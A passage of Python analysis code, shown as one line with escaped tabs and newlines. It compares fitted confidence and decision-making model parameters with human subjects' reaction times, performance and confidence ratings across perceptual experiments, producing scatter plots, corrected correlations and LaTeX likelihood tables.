enumerate(['all','decision','confidence']):\n\t\tused_parameter_names = used_parameter_names_dict[used_parameters]\n\t\t\n\t\tc1 = c1s[i]\n\t\tc2 = c2s[i]\n\t\tax = plt.subplot(gs1[i])\n\t\t#~ ax = plt.subplot(2,3,i+1)\n\t\tplt.imshow(c1,aspect='auto',cmap='jet',interpolation='none',extent=[0,len(c1),0,len(c1)],vmin=vmin1,vmax=vmax1)\n\t\tplt.xticks(np.arange(len(c1))+0.5,[exp_alias[str(e)]+' '+str(s) for e,s in zip(experiments[:,0],sessions[:,0])],rotation=60)\n\t\tplt.yticks(np.arange(len(c1))+0.5,[exp_alias[str(e)]+' '+str(s) for e,s in zip(experiments[:,0],sessions[:,0])][::-1])\n\t\tplt.title('Pars = '+used_parameters)\n\t\tif i==0:\n\t\t\tplt.colorbar(cax=plt.subplot(gs2[0]))\n\t\t\tplt.ylabel('Task correlation')\n\t\t\n\t\tax = plt.subplot(gs1[i+3])\n\t\t#~ ax = plt.subplot(2,3,i+4)\n\t\tplt.imshow(c2,aspect='auto',cmap='jet',interpolation='none',extent=[0,len(c2),0,len(c2)],vmin=vmin2,vmax=vmax2)\n\t\tplt.xticks(np.arange(len(c2))+0.5,[par_alias[p] for p in used_parameter_names],rotation=60,fontsize=14)\n\t\tplt.yticks(np.arange(len(c2))+0.5,[par_alias[p] for p in used_parameter_names][::-1],fontsize=14)\n\t\tif i==0:\n\t\t\tplt.colorbar(cax=plt.subplot(gs2[1]))\n\t\t\tplt.ylabel('Parameter correlation')\n\tplt.show(True)\n\ndef correct_rho_pval(pvals):\n\tout = np.empty_like(pvals)\n\tout[:,:] = pvals[:,:]\n\tps = []\n\tfor rowind,row in enumerate(pvals):\n\t\tfor pval in row[rowind+1:]:\n\t\t\tps.append(pval)\n\tps = utils.holm_bonferroni(np.array(ps))\n\tcounter = 0\n\tfor j,pj in enumerate(pvals):\n\t\tfor k,pk in enumerate(pvals[j+1:]):\n\t\t\tout[j,j+k+1] = ps[counter]\n\t\t\tout[j+k+1,j] = ps[counter]\n\t\t\tcounter+=1\n\treturn out\n\ndef binary_confidence_analysis(analyzer_kwargs={}):\n\ta = Analyzer(**analyzer_kwargs)\n\tparameters,parameter_names,names,sessions,experiments = \\\n\t\ta.get_parameter_array_from_summary(normalize={'internal_var':'experiment'})\n\t#~ parameters,parameter_names,names,sessions,experiments = \\\n\t\t#~ a.get_parameter_array_from_summary(normalize={'internal_var':'experiment',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'confidence_map_slope':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'cost':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'high_confidence_threshold':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'dead_time':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'dead_time_sigma':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'phase_out_prob':'all'})\n\t\n\tsubj_rt = []\n\tsubj_hit_rt = []\n\tsubj_miss_rt = []\n\tsubj_perf = []\n\tsubj_conf = []\n\tsubj_hit_conf = []\n\tsubj_miss_conf = []\n\tsubj_median_conf = []\n\tmodel_rt = []\n\tmodel_hit_rt = []\n\tmodel_miss_rt = []\n\tmodel_perf = []\n\tmodel_conf = []\n\tmodel_hit_conf = []\n\tmodel_miss_conf = []\n\tmodel_median_conf = []\n\texperiments = []\n\tsessions = []\n\tnames = []\n\tsummary = a.summary\n\tsubjects = io.filter_subjects_list(io.unique_subject_sessions(fits.raw_data_dir),'all_sessions_by_experiment')\n\tfor k in summary['theoretical'].keys():\n\t\tvals = summary['theoretical'][k]\n\t\tsubj_key = '_'.join(['experiment_'+vals['experiment'],'subject_'+str(vals['name']),'session_'+str(vals['session'])])\n\t\tsubj_vals = summary['experimental'][subj_key]\n\t\ttry:\n\t\t\tnames.append(int(vals['name']))\n\t\texcept:\n\t\t\tnames.append(vals['name'])\n\t\ttry:\n\t\t\tsessions.append(int(vals['session']))\n\t\texcept:\n\t\t\tsessions.append(vals['session'])\n\t\texperiments.append(vals['experiment'])\n\t\tsubj_rt.append(np.array([subj_vals['means']['rt'],subj_vals['stds']['rt']]))\n\t\tsubj_hit_rt.append(np.array([subj_vals['means']['hit_rt'],subj_vals['stds']['hit_rt']]))\n\t\tsubj_miss_rt.append(np.array([subj_vals['means']['miss_rt'],subj_vals['stds']['miss_rt']]))\n\t\tsubj_perf.append(np.array([subj_vals['means']['performance'],subj_vals['stds']['performance']]))\n\t\tsubj_conf.append(np.array([subj_vals['means']['confidence'],subj_vals['stds']['confidence']]))\n\t\tsubj_hit_conf.append(np.array([subj_vals['means']['hit_confidence'],subj_vals['stds']['hit_confidence']]))\n\t\tsubj_miss_conf.append(np.array([subj_vals['means']['miss_confidence'],subj_vals['stds']['miss_confidence']]))\n\t\tmodel_rt.append(vals['rt'])\n\t\tmodel_hit_rt.append(vals['hit_rt'])\n\t\tmodel_miss_rt.append(vals['miss_rt'])\n\t\tmodel_perf.append(vals['performance'])\n\t\tmodel_conf.append(vals['confidence'])\n\t\tmodel_hit_conf.append(vals['hit_confidence'])\n\t\tmodel_miss_conf.append(vals['miss_confidence'])\n\t\t\n\t\tsubject = [s for s in subjects if s.experiment==vals['experiment'] and s.get_name()==str(vals['name']) and s.get_session()==str(vals['session'])][0]\n\t\tdata = subject.load_data()\n\t\tsubj_median_conf.append(np.median(data[:,3]))\n\t\tmodel_median_conf.append(vals['parameters']['high_confidence_threshold'])\n\tsubj_rt = np.array(subj_rt)\n\tsubj_hit_rt = np.array(subj_hit_rt)\n\tsubj_miss_rt = np.array(subj_miss_rt)\n\tsubj_conf = np.array(subj_conf)\n\tsubj_hit_conf = np.array(subj_hit_conf)\n\tsubj_miss_conf = np.array(subj_miss_conf)\n\tsubj_perf = np.array(subj_perf)\n\tplt.figure(figsize=(14,10))\n\tplt.subplot(241)\n\tplt.errorbar(model_rt,subj_rt[:,0],subj_rt[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = list(plt.gca().get_ylim())\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.ylabel('Subject')\n\tplt.title('Mean RT')\n\t\n\tplt.subplot(242)\n\tplt.errorbar(model_hit_rt,subj_hit_rt[:,0],subj_hit_rt[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean hit RT')\n\t\n\tplt.subplot(243)\n\tplt.errorbar(model_miss_rt,subj_miss_rt[:,0],subj_miss_rt[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean miss RT')\n\t\n\tplt.subplot(244)\n\tplt.errorbar(model_perf,subj_perf[:,0],subj_perf[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean performance')\n\t\n\tplt.subplot(234)\n\tplt.errorbar(model_conf,subj_conf[:,0],subj_conf[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.ylabel('Subject')\n\tplt.xlabel('Model')\n\tplt.title('Mean Confidence')\n\t\n\tplt.subplot(235)\n\tplt.errorbar(model_hit_conf,subj_hit_conf[:,0],subj_hit_conf[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean hit Confidence')\n\tplt.xlabel('Model')\n\t\n\tplt.subplot(236)\n\tplt.errorbar(model_miss_conf,subj_miss_conf[:,0],subj_miss_conf[:,1],marker='.',linestyle='')\n\txlim = list(plt.gca().get_xlim())\n\tylim = plt.gca().get_ylim()\n\txlim[0] = min([xlim[0],ylim[0]])\n\txlim[1] = max([xlim[1],ylim[1]])\n\tplt.plot(xlim,xlim,'--r')\n\tplt.gca().set_xlim(xlim)\n\tplt.gca().set_ylim(xlim)\n\tplt.title('Mean miss Confidence')\n\tplt.xlabel('Model')\n\t\n\tplt.show(True)\n\ndef correlation_analysis(analyzer_kwargs={}):\n\ta = Analyzer(**analyzer_kwargs)\n\tsubj,model = a.get_summary_stats_array(normalize={'internal_var':'experiment'})\n\t#~ subj,model = a.get_summary_stats_array(normalize={'internal_var':'experiment',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'confidence_map_slope':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'cost':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'high_confidence_threshold':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'dead_time':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'dead_time_sigma':'all',\\\n\t\t\t\t\t\t\t\t\t\t\t\t\t #~ 'phase_out_prob':'all'})\n\t\n\tue,c = np.unique(model['experiment'],return_inverse=True)\n\t\n\tparameter_names = ['cost','internal_var','phase_out_prob','dead_time','dead_time_sigma','high_confidence_threshold','confidence_map_slope']\n\tparameter_aliases = {'cost':r'$c$',\n\t\t\t\t\t\t'internal_var':r'$\\sigma^{2}$',\n\t\t\t\t\t\t'phase_out_prob':r'$p_{po}$',\n\t\t\t\t\t\t'high_confidence_threshold':r'$C_{H}$',\n\t\t\t\t\t\t'confidence_map_slope':r'$\\alpha$',\n\t\t\t\t\t\t'dead_time':r'$\\tau_{c}$',\n\t\t\t\t\t\t'dead_time_sigma':r'$\\sigma_{c}$'}\n\t# Correlation between parameters and mean confidence\n\tplt.figure()\n\taxs = {'cost':plt.subplot(231),\n\t\t\t'internal_var':plt.subplot(232),\n\t\t\t'phase_out_prob':plt.subplot(233),\n\t\t\t'high_confidence_threshold':plt.subplot(245),\n\t\t\t'confidence_map_slope':plt.subplot(246),\n\t\t\t'dead_time':plt.subplot(247),\n\t\t\t'dead_time_sigma':plt.subplot(248)}\n\tylabels = {'cost':'Mean confidence',\n\t\t\t'internal_var':'',\n\t\t\t'phase_out_prob':'',\n\t\t\t'high_confidence_threshold':'Mean confidence',\n\t\t\t'confidence_map_slope':'',\n\t\t\t'dead_time':'',\n\t\t\t'dead_time_sigma':''}\n\tfor par in parameter_names:\n\t\tax = axs[par]\n\t\tax.scatter(model[par],subj['confidence_mean'],c=c)\n\t\tax.set_xlabel(parameter_aliases[par])\n\t\tax.set_ylabel(ylabels[par])\n\tplt.suptitle('Correlation between parameters and mean confidence')\n\t\n\t# Correlation between parameters and mean RT\n\tplt.figure()\n\taxs = {'cost':plt.subplot(231),\n\t\t\t'internal_var':plt.subplot(232),\n\t\t\t'phase_out_prob':plt.subplot(233),\n\t\t\t'high_confidence_threshold':plt.subplot(245),\n\t\t\t'confidence_map_slope':plt.subplot(246),\n\t\t\t'dead_time':plt.subplot(247),\n\t\t\t'dead_time_sigma':plt.subplot(248)}\n\tylabels['cost'] = ylabels['high_confidence_threshold'] = 'Mean RT'\n\tfor par in parameter_names:\n\t\tax = axs[par]\n\t\tax.scatter(model[par],subj['rt_mean'],c=c)\n\t\tax.set_xlabel(parameter_aliases[par])\n\t\tax.set_ylabel(ylabels[par])\n\tplt.suptitle('Correlation between parameters and mean RT')\n\t\n\t# Correlation between parameters and mean performance\n\tplt.figure()\n\taxs = {'cost':plt.subplot(231),\n\t\t\t'internal_var':plt.subplot(232),\n\t\t\t'phase_out_prob':plt.subplot(233),\n\t\t\t'high_confidence_threshold':plt.subplot(245),\n\t\t\t'confidence_map_slope':plt.subplot(246),\n\t\t\t'dead_time':plt.subplot(247),\n\t\t\t'dead_time_sigma':plt.subplot(248)}\n\tylabels['cost'] = ylabels['high_confidence_threshold'] = 'Mean performance'\n\tfor par in parameter_names:\n\t\tax = axs[par]\n\t\tax.scatter(model[par],subj['performance_mean'],c=c)\n\t\tax.set_xlabel(parameter_aliases[par])\n\t\tax.set_ylabel(ylabels[par])\n\tplt.suptitle('Correlation between parameters and mean performance')\n\t\n\tfrom scipy.stats import linregress, ttest_rel, ttest_ind, ttest_1samp\n\t# Agreement between data means and fit\n\tf = plt.figure()\n\taxs = {'rt':plt.subplot(231),'confidence':plt.subplot(232),\n\t\t 'performance':plt.subplot(233),'hit_rt':plt.subplot(245),\n\t\t 'miss_rt':plt.subplot(246),'hit_confidence':plt.subplot(247),\n\t\t 'miss_confidence':plt.subplot(248)}\n\ttitles = {'rt':'Mean RT','confidence':'Mean confidence',\n\t\t\t 'performance':'Mean performance','hit_rt':'Mean RT for hits',\n\t\t\t 'miss_rt':'Mean RT for misses','hit_confidence':'Mean conf for hits',\n\t\t\t 'miss_confidence':'Mean conf for misses'}\n\tylabels = {'rt':'Subject data','confidence':'','performance':'',\n\t\t\t 'hit_rt':'Subject data','miss_rt':'',\n\t\t\t 'hit_confidence':'','miss_confidence':''}\n\txlabels = {'rt':'','confidence':'','performance':'',\n\t\t\t 'hit_rt':'Model data','miss_rt':'Model data',\n\t\t\t 'hit_confidence':'Model data','miss_confidence':'Model data'}\n\tfor key in axs.keys():\n\t\tax = axs[key]\n\t\tfor i,exp in enumerate(ue):\n\t\t\tcolor = plt.get_cmap('jet')(float(i)/float(len(ue)-1))\n\t\t\tinds = c==i\n\t\t\tlabel = {'2AFC':'Contrast','Auditivo':'Auditory','Luminancia':'Luminance'}[str(exp).strip('\\x00')]\n\t\t\tax.errorbar(model[key+'_mean'][inds],subj[key+'_mean'][inds],subj[key+'_std'][inds],linestyle='',marker='o',color=color,label=label)\n\t\tslope,intercept,rvalue,_,stder = linregress(model[key+'_mean'],subj[key+'_mean'])\n\t\tpar,cov = utils.linear_least_squares(model[key+'_mean'],subj[key+'_mean'],subj[key+'_std'])\n\t\ttvalue,pvalue = ttest_1samp(subj[key+'_mean']-model[key+'_mean'],0.)\n\t\ttitle = titles[key]\n\t\t#~ if pvalue<0.05:\n\t\t\t#~ title+=' *'\n\t\t\t#~ if pvalue<0.005:\n\t\t\t\t#~ title+='*'\n\t\t\t\t#~ if pvalue<0.0005:\n\t\t\t\t\t#~ title+='*'\n\t\tax.set_title(title)\n\t\tax.set_xlabel(xlabels[key])\n\t\tax.set_ylabel(ylabels[key])\n\t\txlim = np.array(ax.get_xlim())\n\t\tylim = np.array(ax.get_ylim())\n\t\txlim[0] = min([xlim[0],ylim[0]])\n\t\txlim[1] = max([xlim[1],ylim[1]])\n\t\tylim = xlim\n\t\txlsq = np.linspace(xlim[0],xlim[1],1000)\n\t\tylsq,sylsq = utils.linear_least_squares_prediction(xlsq,par,cov)\n\t\tax.plot(xlsq,ylsq,color='gray',linewidth=2)\n\t\tax.fill_between(xlsq,ylsq-2*sylsq,ylsq+2*sylsq,facecolor='gray',alpha=0.4,interpolate=True)\n\t\tax.plot(xlim,xlim,color='k',linewidth=2)\n\t\tax.set_xlim(xlim)\n\t\tax.set_ylim(ylim)\n\t\tif key=='rt':\n\t\t\tax.legend(loc='best', fancybox=True, framealpha=0.5)\n\tplt.figure(f.number)\n\tutils.maximize_figure()\n\tplt.suptitle('Agreement between data means and fit',fontsize=18)\n\t\n\t# Agreement between data medians and fit\n\tplt.figure()\n\taxs = {'rt':plt.subplot(221),'confidence':plt.subplot(222),\n\t\t 'hit_rt':plt.subplot(245),'miss_rt':plt.subplot(246),\n\t\t 'hit_confidence':plt.subplot(247),'miss_confidence':plt.subplot(248)}\n\ttitles = {'rt':'Median RT','confidence':'Median confidence',\n\t\t\t 'hit_rt':'Median RT for hits','miss_rt':'Median RT for misses',\n\t\t\t 'hit_confidence':'Median conf for hits',\n\t\t\t 'miss_confidence':'Median conf for misses'}\n\tylabels = {'rt':'Subject data','confidence':'',\n\t\t\t 'hit_rt':'Subject data','miss_rt':'',\n\t\t\t 'hit_confidence':'','miss_confidence':''}\n\txlabels = {'rt':'','confidence':'',\n\t\t\t 'hit_rt':'Model data','miss_rt':'Model data',\n\t\t\t 'hit_confidence':'Model data','miss_confidence':'Model data'}\n\tfor key in axs.keys():\n\t\tax = axs[key]\n\t\tfor i,exp in enumerate(ue):\n\t\t\tcolor = plt.get_cmap('jet')(float(i)/float(len(ue)-1))\n\t\t\tinds = c==i\n\t\t\tlabel = {'2AFC':'Contrast','Auditivo':'Auditory','Luminancia':'Luminance'}[str(exp).strip('\\x00')]\n\t\t\tax.errorbar(model[key+'_median'][inds],subj[key+'_median'][inds],subj[key+'_std'][inds],linestyle='',marker='o',color=color,label=label)\n\t\t#~ slope,intercept,rvalue,_,stder = linregress(model[key+'_median'],subj[key+'_median'])\n\t\tpar,cov = utils.linear_least_squares(model[key+'_median'],subj[key+'_median'],subj[key+'_std'])\n\t\ttvalue,pvalue = ttest_1samp(subj[key+'_median']-model[key+'_median'],0.)\n\t\t#~ print(key,np.mean(subj[key+'_median']-model[key+'_median']),tvalue,pvalue)\n\t\ttitle = titles[key]\n\t\tif key=='rt':\n\t\t\tax.legend(loc='best', fancybox=True, framealpha=0.5)\n\t\t#~ if pvalue<0.05:\n\t\t\t#~ title+=' *'\n\t\t\t#~ if pvalue<0.005:\n\t\t\t\t#~ title+='*'\n\t\t\t\t#~ if pvalue<0.0005:\n\t\t\t\t\t#~ title+='*'\n\t\tax.set_title(title)\n\t\tax.set_xlabel(xlabels[key])\n\t\tax.set_ylabel(ylabels[key])\n\t\txlim = np.array(ax.get_xlim())\n\t\tylim = np.array(ax.get_ylim())\n\t\txlim[0] = min([xlim[0],ylim[0]])\n\t\txlim[1] = max([xlim[1],ylim[1]])\n\t\tylim = xlim\n\t\txlsq = np.linspace(xlim[0],xlim[1],1000)\n\t\tylsq,sylsq = utils.linear_least_squares_prediction(xlsq,par,cov)\n\t\tax.plot(xlsq,ylsq,color='gray',linewidth=2)\n\t\tax.fill_between(xlsq,ylsq-2*sylsq,ylsq+2*sylsq,facecolor='gray',alpha=0.4,interpolate=True)\n\t\tax.plot(xlim,xlim,color='k',linewidth=2)\n\t\tax.set_xlim(xlim)\n\t\tax.set_ylim(ylim)\n\tutils.maximize_figure()\n\tplt.suptitle('Agreement between data medians and fit',fontsize=18)\n\t\n\t# Correlation between parameters and: mean RT, performance, mean confidence, AUC and multi mod index\n\tstudied_parameters = [par for par in parameter_names if par not in ['dead_time','dead_time_sigma']]\n\tparameters = np.array([model[par] for par in studied_parameters])\n\tgroup_width = 0.9\n\tbar_width = group_width/5\n\tbar_pos = np.arange(parameters.shape[0])\n\tgroup_center = bar_pos+0.5*group_width\n\tplt.figure()\n\tcolors = ['r','g','b','y','m']\n\tstudied_stats = ['rt_mean','performance_mean','confidence_mean','auc','multi_mod_index']\n\tstat_aliases = {'rt_mean':'Mean RT','performance_mean':'Performance',\n\t\t\t\t\t'confidence_mean':'Mean Confidence',\n\t\t\t\t\t'auc':'AUC','multi_mod_index':\"Hartigan's DIP\"}\n\tbars = []\n\tpvals = []\n\tsigns = []\n\tax1 = plt.subplot(211)\n\tax2 = plt.subplot(212)\n\tfor i,stat in enumerate(studied_stats):\n\t\tcorr,pval = utils.corrcoef(subj[stat],parameters)\n\t\tcorr = corr[0,1:]\n\t\tpval = pval[0,1:]\n\t\tpvals.append(pval)\n\t\tbars.append(ax1.bar(bar_pos+i*bar_width,np.abs(corr),bar_width,color=colors[i]))\n\t\tax2.bar(bar_pos+i*bar_width,corr,bar_width,color=colors[i])\n\t\tsigns.append(np.sign(corr))\n\tpvals = np.array(pvals)\n\tsh = pvals.shape\n\tpvals = utils.holm_bonferroni(pvals.reshape((-1))).reshape(sh)\n\tfor rects,pval,sign in zip(bars,pvals,signs):\n\t\tfor rect,p,si in zip(rects,pval,sign):\n\t\t\tsignificance_mark = ''\n\t\t\tif p<0.05:\n\t\t\t\tsignificance_mark+='*'\n\t\t\t\tif p<0.005:\n\t\t\t\t\tsignificance_mark+='*'\n\t\t\t\t\tif p<0.0005:\n\t\t\t\t\t\tsignificance_mark+='*'\n\t\t\theight = rect.get_height()\n\t\t\tx = rect.get_x() + rect.get_width()/2.\n\t\t\tax1.text(rect.get_x() + rect.get_width()/2., height, significance_mark,ha='center', va='bottom')\n\t\t\tax2.text(rect.get_x() + rect.get_width()/2., height*si, significance_mark,ha='center', va='bottom' if si>=0 else 'top')\n\tax1.set_xticks(group_center)\n\tax2.set_xticks(group_center)\n\tax1.set_xticklabels([parameter_aliases[par] for par in studied_parameters],fontsize=16)\n\tax2.set_xticklabels([parameter_aliases[par] for par in studied_parameters],fontsize=16)\n\tax1.set_ylabel('Absolute correlation')\n\tax2.set_ylabel('Correlation')\n\tax1.legend([r[0] for r in bars],[stat_aliases[stat] for stat in studied_stats],loc='best', fancybox=True, framealpha=0.5)\n\tax2.plot(ax2.get_xlim(),[0,0],'k')\n\tutils.maximize_figure()\n\tplt.show(True)\n\ndef compare_mappings():\n\texperiment_alias = {'2AFC':'Con','Auditivo':'Aud','Luminancia':'Lum'}\n\tall_lo = Analyzer(cmap_meth='log_odds').get_summary_stats_array()[1]\n\t# For some reason we dont have the fit result for the linear mapping\n\t# of experiment Luminancia subject 12 and session 1 (index 113 of lo)\n\t#~ all_lo = np.concatenate((all_lo[:113],all_lo[114:]),axis=0)\n\tall_li = Analyzer(cmap_meth='belief').get_summary_stats_array()[1]\n\tcat = 'experiment'\n\tucat_lo = np.unique(all_lo[cat])\n\tucat_li = np.unique(all_li[cat])\n\toutput = [['Experiment',r'$nLL\\left(\\mathcal{C}_{\\mathcal{L}_{o}}\\right)$',r'$nLL\\left(\\mathcal{C}_{s}\\right)$',r'$2\\log\\left(\\frac{\\mathcal{L}(\\mathcal{C}_{s})}{\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})}\\right)$']]\n\tall_lo_nLL = 0.\n\tall_li_nLL = 0.\n\tfor ucat in ucat_lo:\n\t\tlo = all_lo[ucat==all_lo[cat]]\n\t\tli = all_li[ucat==all_li[cat]]\n\t\ttotal_lo_nLL = np.sum(lo['full_confidence_merit'])\n\t\ttotal_li_nLL = np.sum(li['full_confidence_merit'])\n\t\tall_lo_nLL+= total_lo_nLL\n\t\tall_li_nLL+= total_li_nLL\n\t\tpercent_of_low_li = np.sum((lo['full_confidence_merit']>li['full_confidence_merit']).astype(np.float))/float(len(lo))*100\n\t\tlog_likelihood_ratio = lo['full_confidence_merit']-li['full_confidence_merit'] # The stored values are nLL so this is equal to log(li_like/lo_like)\n\t\t#~ print(ucat)\n\t\t#~ print('Overall log_odds mapping nLL = {0}'.format(total_lo_nLL))\n\t\t#~ print('Overall linear mapping nLL = {0}'.format(total_li_nLL))\n\t\t#~ print('Percent of experiment,subject,session tuples that are better explained with the linear mapping = {0}%'.format(percent_of_low_li))\n\t\t#~ print('Mean log likelihood ratio in favor of linear mapping = {0}'.format(np.mean(log_likelihood_ratio)))\n\t\t#~ print('Likelihood ratio T-value = {0}'.format(np.exp(np.mean(log_likelihood_ratio))))\n\t\t#~ print('Likelihood ratio p-value = {0}'.format(0.5*(1-stats.t.cdf(np.exp(np.mean(log_likelihood_ratio)),1))))\n\t\t#~ print('Total double log likelihood ratio = {0}'.format(2*np.sum(log_likelihood_ratio)))\n\t\t#~ print('Total log likelihood ratio Wilk´s p-value = {0}'.format(0.5*(1-stats.chi2.cdf(2*np.sum(log_likelihood_ratio),1))))\n\t\t\n\t\t#~ plt.hist(log_likelihood_ratio)\n\t\t#~ plt.xlabel('nLL(log_odds)-nLL(linear)')\n\t\t#~ plt.show(True)\n\t\toutput.append([experiment_alias[str(ucat).replace(' x00','')],'{0:.2f}'.format(total_lo_nLL),'{0:.2f}'.format(total_li_nLL),'{0:.2f}'.format(2*np.sum(log_likelihood_ratio))])\n\toutput.append([u'All','{0:.2f}'.format(all_lo_nLL),'{0:.2f}'.format(all_li_nLL),'{0:.2f}'.format(2*(all_lo_nLL-all_li_nLL))])\n\toutput = ' \\\\\\\\ \\\\hline\\n'.join([' & '.join(x) for x in output])+' \\\\\\\\ \\\\hline\\n'\n\tprint(output)\n\t\n\t\n\tcat = 'name'\n\tucat_lo = np.unique(all_lo[cat])\n\tucat_li = np.unique(all_li[cat])\n\toutput = [['Subject id',r'$nLL\\left(\\mathcal{C}_{\\mathcal{L}_{o}}\\right)$',r'$nLL\\left(\\mathcal{C}_{s}\\right)$',r'$2\\log\\left(\\frac{\\mathcal{L}(\\mathcal{C}_{s})}{\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})}\\right)$']]\n\tall_lo_nLL = 0.\n\tall_li_nLL = 0.\n\tdtype = ucat_lo.dtype\n\tucat_lo = np.sort(ucat_lo.astype(np.int)).astype(dtype)\n\tfor ucat in ucat_lo:\n\t\tlo = all_lo[ucat==all_lo[cat]]\n\t\tli = all_li[ucat==all_li[cat]]\n\t\ttotal_lo_nLL = np.sum(lo['full_confidence_merit'])\n\t\ttotal_li_nLL = np.sum(li['full_confidence_merit'])\n\t\tall_lo_nLL+= total_lo_nLL\n\t\tall_li_nLL+= total_li_nLL\n\t\tpercent_of_low_li = np.sum((lo['full_confidence_merit']>li['full_confidence_merit']).astype(np.float))/float(len(lo))*100\n\t\tlog_likelihood_ratio = lo['full_confidence_merit']-li['full_confidence_merit'] # The stored values are nLL so this is equal to log(li_like/lo_like)\n\t\t#~ print(ucat)\n\t\t#~ print('Overall log_odds mapping nLL = {0}'.format(total_lo_nLL))\n\t\t#~ print('Overall linear mapping nLL = {0}'.format(total_li_nLL))\n\t\t#~ print('Percent of experiment,subject,session tuples that are better explained with the linear mapping = {0}%'.format(percent_of_low_li))\n\t\t#~ print('Mean log likelihood ratio in favor of linear mapping = {0}'.format(np.mean(log_likelihood_ratio)))\n\t\t#~ print('Likelihood ratio T-value = {0}'.format(np.exp(np.mean(log_likelihood_ratio))))\n\t\t#~ print('Likelihood ratio p-value = {0}'.format(0.5*(1-stats.t.cdf(np.exp(np.mean(log_likelihood_ratio)),1))))\n\t\t#~ print('Total double log likelihood ratio = {0}'.format(2*np.sum(log_likelihood_ratio)))\n\t\t#~ print('Total log likelihood ratio Wilk´s p-value = {0}'.format(0.5*(1-stats.chi2.cdf(2*np.sum(log_likelihood_ratio),1))))\n\t\t\n\t\t#~ plt.hist(log_likelihood_ratio)\n\t\t#~ plt.xlabel('nLL(log_odds)-nLL(linear)')\n\t\t#~ plt.show(True)\n\t\toutput.append([str(ucat).replace(' x00',''),'{0:.2f}'.format(total_lo_nLL),'{0:.2f}'.format(total_li_nLL),'{0:.2f}'.format(2*np.sum(log_likelihood_ratio))])\n\toutput.append([u'All','{0:.2f}'.format(all_lo_nLL),'{0:.2f}'.format(all_li_nLL),'{0:.2f}'.format(2*(all_lo_nLL-all_li_nLL))])\n\toutput = ' \\\\\\\\ \\\\hline\\n'.join([' & '.join(x) for x in output])+' \\\\\\\\ \\\\hline\\n'\n\tprint(output)\n\t\n\t\n\tlabel_ind,ucat_lo_inds = utils.unique_rows(np.hstack((all_lo['experiment'][:,None],all_lo['session'][:,None])),return_index=True,return_inverse=True)[1:]\n\tucat_li_inds = utils.unique_rows(np.hstack((all_li['experiment'][:,None],all_li['session'][:,None])),return_inverse=True)[1]\n\toutput = [['Experiment session',r'$nLL\\left(\\mathcal{C}_{\\mathcal{L}_{o}}\\right)$',r'$nLL\\left(\\mathcal{C}_{s}\\right)$',r'$2\\log\\left(\\frac{\\mathcal{L}(\\mathcal{C}_{s})}{\\mathcal{L}(\\mathcal{C}_{\\mathcal{L}_{o}})}\\right)$']]\n\tall_lo_nLL = 0.\n\tall_li_nLL = 0.\n\tucat_label = sorted([' '.join([experiment_alias[str(x['experiment']).strip(' \\x00')],'Ses='+str(x['session']).strip(' \\x00')]) for x in all_lo[label_ind]])\n\tdtype = ucat_lo.dtype\n\tucat_lo = np.sort(ucat_lo.astype(np.int)).astype(dtype)\n\tfor ind,ucat in enumerate(ucat_label):\n\t\tlo = all_lo[ucat_lo_inds==ind]\n\t\tli = all_li[ucat_li_inds==ind]\n\t\ttotal_lo_nLL = np.sum(lo['full_confidence_merit'])\n\t\ttotal_li_nLL = np.sum(li['full_confidence_merit'])\n\t\tall_lo_nLL+= total_lo_nLL\n\t\tall_li_nLL+= total_li_nLL\n\t\tpercent_of_low_li = np.sum((lo['full_confidence_merit']>li['full_confidence_merit']).astype(np.float))/float(len(lo))*100\n\t\tlog_likelihood_ratio = lo['full_confidence_merit']-li['full_confidence_merit'] # The stored values are nLL so this is equal to log(li_like/lo_like)\n\t\t#~ print(ucat)\n\t\t#~ print('Overall log_odds mapping nLL = 